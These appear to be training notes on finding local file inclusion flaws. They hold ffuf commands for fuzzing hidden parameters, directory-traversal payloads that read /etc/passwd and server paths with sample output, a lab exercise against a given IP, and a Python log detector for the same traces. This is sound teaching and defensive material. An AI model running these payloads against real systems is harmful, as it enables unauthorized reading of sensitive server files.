It's important to always fuzz a web app because the page may have other exposed parameters that are not linked to any HTML form, so normal users would never access them or unintentionally cause harm through them.
Fuzz the page for common GET parameters:
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
Once we have found a hidden parameter, we can run our LFI tests against it. A good wordlist is LFI-Jhaddix.txt, as it contains various bypasses and common files:
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287
The output would look something like this:
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd [Status: 200, Size: 3661, Words: 645, Lines: 91]
../../../../../../../../../../../../etc/hosts [Status: 200, Size: 2461, Words: 636, Lines: 72]
...SNIP...
../../../../etc/passwd [Status: 200, Size: 3661, Words: 645, Lines: 91]
We must also try to fuzz for the server webroot path, the server configuration files, and the server logs.
We can fuzz for the index.php file through common webroot paths, which we can find in the SecLists wordlist for Linux (default-web-root-directory-linux.txt, used below) or the corresponding wordlist for Windows. Depending on our LFI situation, we may need to prepend a few back directories (e.g. ../../../../) and then append index.php afterwards:
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287
The output would be something like:
/var/www/html/ [Status: 200, Size: 0, Words: 1, Lines: 1]
To find server logs and configuration paths, we can use this wordlist for Linux (LFI-WordList-Linux, used below) or the corresponding wordlist for Windows:
ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287
Output:
<SNIP>
/etc/hosts [Status: 200, Size: 2461, Words: 636, Lines: 72]
/etc/hostname [Status: 200, Size: 2300, Words: 634, Lines: 66]
<SNIP>
Exercise: Fuzz the web application for exposed parameters, then try to exploit it with one of the LFI wordlists to read /flag.txt
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://94.237.53.113:55545/index.php?FUZZ=value' -fs 2309
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://94.237.53.113:55545/index.php?view=FUZZ' -fs 1935
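Added example (not from the page or the HTB module): a small Python detector, run over constructed access-log lines, that flags the two server-side traces the fuzzing above leaves behind: a burst of distinct parameter names from one client, and traversal payloads (including the URL-encoded form seen in the ffuf output) after decoding. The log format, the sensitive-path list and the burst threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic): one normal request,
# a parameter-name fuzzing burst from 10.0.0.9, then two traversal payloads.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?language=en HTTP/1.1" 200 2287
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=value HTTP/1.1" 200 2287
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=value HTTP/1.1" 200 2287
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?file=value HTTP/1.1" 200 2287
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?language=..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd HTTP/1.1" 200 3661
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?language=../../../../etc/hosts HTTP/1.1" 200 2461
"""

# Assumed combined-log layout: client IP first, request line in quotes.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<path>\S+) HTTP')
# Assumed list of paths an LFI wordlist typically probes for.
SENSITIVE = ("/etc/passwd", "/etc/hosts", "/etc/hostname", "/var/www/html")

def normalize(value: str) -> str:
    """Percent-decode until stable (catches double encoding), unify separators."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return re.sub(r"/+", "/", value.replace("\\", "/"))

def analyze(log_text: str, fuzz_threshold: int = 3):
    """Return (traversal hits, set of IPs that probed >= fuzz_threshold parameter names)."""
    traversal = []
    params_per_ip = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path = m.group("ip"), m.group("path")
        for pair in path.partition("?")[2].split("&"):
            name, _, raw = pair.partition("=")
            params_per_ip[ip].add(name)
            val = normalize(raw)
            if "../" in val or any(s in val for s in SENSITIVE):
                traversal.append((ip, name, val))
    fuzzers = {ip for ip, names in params_per_ip.items() if len(names) >= fuzz_threshold}
    return traversal, fuzzers

if __name__ == "__main__":
    hits, fuzzing_ips = analyze(SAMPLE_LOG)
    print("traversal attempts:", hits)
    print("parameter-fuzzing clients:", fuzzing_ips)
```

The `-fs` filter in the ffuf commands hides responses of the normal page size, so on the defending side the size of the 200 response (3661 vs 2287 above) is a second signal that an include actually succeeded.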